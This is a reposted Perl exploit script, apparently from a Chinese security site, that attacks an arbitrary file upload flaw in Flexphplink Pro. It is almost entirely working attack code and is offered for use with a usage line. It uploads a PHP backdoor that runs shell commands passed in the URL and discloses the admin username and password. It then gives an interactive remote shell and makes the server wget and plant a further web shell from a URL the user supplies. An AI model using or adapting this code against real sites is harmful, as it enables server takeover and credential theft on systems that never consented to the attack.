Flexphplink Pro Arbitrary File Upload Exploit
|
来源:http://osirys.org 作者:Osirys 发布时间:2008-12-29
|
|
#!/usr/bin/perl
# HAPPY CHRISTMAS !! # Flexphplink Pro # http://www.hotscripts.com/jump.php?listing_id=21062&jump_type=1 # Bug: Arbitrary File Upload # * I coded this exploit just for fun ;) # Exploit coded by Osirys # osirys[at]live[dot]it # http://osirys.org # Greets: x0r, miclen, emgent, str0ke, Todd and AlpHaNiX
# Example: # osirys[~]>$ perl exp.txt http://localhost/flexphplinkproen/ # ============================ # Flexphplink Pro Exploit # Coded by Osirys # osirys[at]live[dot]it # Proud to be italian # ============================ # [+] http://localhost/flexphplinkproen/ backdoored, just type your choise: # 1 - Admin Details Disclosure # 2 - Arbitrary Command Execution # 3 - Shell upload # 4 - Exit # 1 # [+] Extracting Admin Login Details . # [+] Done: # Username: admin # Password: adminz # osirys[~]>$
use HTTP::Request; use LWP::UserAgent;
my $path = "/submitlink.php"; my $u_path = "/linkphoto/"; my $l_file = "back.php";
my $code = "<?php echo \"<b>RCE backdoor</b><br><br>\";if(!empty(\$_GET['cmd'])&&empty". "(\$_GET['adm'])){echo\"<b>CMD: </b>\";system(\$_GET['cmd']);}elseif((\$_GET". "['adm']==\"get\")&&empty(\$_GET['cmd'])){if(is_file(\"../const.inc.php3\" )". "){include('../const.inc.php3');}elseif(is_file(\"../const.inc.php\")){ incl". "ude ('../const.inc.php');}echo \"<b>Username: </b>\$admin_username\"; echo". "\"<br>\"; echo \"<b>Password: </b>\$admin_password\"; } ?>";
my $host = $ARGV[0];
($host) || help("-1"); cheek($host) == 1 || help("-2"); &banner;
open ($file, ">", $l_file); print $file "$code\n"; close ($file);
$dir = `pwd`; my $f_path = $dir."/".$l_file; $f_path =~ s/\n//;
my $url = $host.$path; my $ua = LWP::UserAgent->new; $time = time(); my $post = $ua->post($url, Content_Type => 'form-data', Content => [ title => 'abco', url => 'def', userfile => [$f_path, '.php'], addlink => 'Add' ] );
if (($post->is_success)&&($post->as_string=~ /Thank you for your submission/)) { `rm -rf $f_path`; cheek_fname($time); ($rcefile) || die "[-] Unable to find phpscript uploaded\n"; &go; } else { print "[-] Unable to upload evil php-code !\n"; exit(0); }
sub go() { my $error = $_[0]; if ($error == -1) { print "[-] Bad Choice\n\n"; } elsif ($error == -2) { print "[-] Bad shell url\n\n"; } print "[+] $host backdoored, just type your choise:\n". " 1 - Admin Details Disclosure\n". " 2 - Arbitrary Command Execution\n". " 3 - Shell upload\n". " 4 - Exit\n";
$choice = <STDIN>; $choice =~ /1|2|3|4/ || go("-1"); if ($choice == 1) { &adm_disc; } elsif ($choice == 2) { &exec_cmd; } elsif ($choice == 3) { &shell_up; } elsif ($choice == 4) { print "[-] Quitting ..\n"; exit(0); } }
sub adm_disc { print "[+] Extracting Admin Login Details ..\n"; $exec_url = ($host.$u_path.$time.".php?adm=get"); $re = query($exec_url); if ($re =~ /Username: <\/b>(.*)<br><b>Password: <\/b>(.*)/) { my($user,$pass) = ($1,$2); print "[+] Done: \n". " Username: $user\n". " Password: $pass\n"; } else { print "[-] Can't extract Admin Details.\n\n"; &go; } }
sub exec_cmd { print "shell\$>\n"; $cmd = <STDIN>; $cmd !~ /exit/ || die "[-] Quitting ..\n"; $exec_url = ($host.$u_path.$time.".php?cmd=".$cmd); $re = query($exec_url); if ($re =~ /<b>CMD: <\/b>(.*)/) { print "[*] $1\n"; &exec_cmd; } else { print "[-] Undefined output or bad cmd !\n"; &exec_cmd; } }
sub shell_up { print "[+] Type now a link for your .txt shell\n". " Shell name must be with .txt extension\n"; $s_link = <STDIN>; $s_link =~ /.*\/(.*)\.txt/ || &go("-2"); $s_name = $1; $exec_url = ($host.$u_path.$time.".php?cmd=wget ".$s_link); $exec_url2 = ($host.$u_path.$time.".php?cmd=mv ".$s_name.".txt ".$s_name.".php"); query($exec_url); query($exec_url2); print "[+] Your shell should be here: ".$host.$u_path.$s_name.".php\n"; }
sub cheek_fname() { my $time = $_[0]; my $name = $time.".php"; $re = query($host.$u_path.$name); if ($re =~ /<b>RCE backdoor<\/b>/) { $rcefile = $name; return; } }
sub query() { $link = $_[0]; my $req = HTTP::Request->new(GET => $link); my $ua = LWP::UserAgent->new(); $ua->timeout(4); my $response = $ua->request($req); return $response->content; }
sub cheek() { my $host = $_[0]; if ($host =~ /http:\/\/(.*)/) { return 1; } else { return 0; } }
sub banner { print "\n". " ============================ \n". " Flexphplink Pro Exploit \n". " Coded by Osirys \n". " osirys[at]live[dot]it \n". " Proud to be italian \n". " ============================ \n\n"; }
sub help() { my $error = $_[0]; if ($error == -1) { &banner; print "\n[-] Cheek that you provide a hostname address!\n"; } elsif ($error == -2) { &banner; print "\n[-] Bad hostname address !\n"; } print "[*] Usage : perl $0 http://hostname/cms_path\n\n"; exit(0); }
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
|
|
|
|
推荐广告 |
|
|
|
|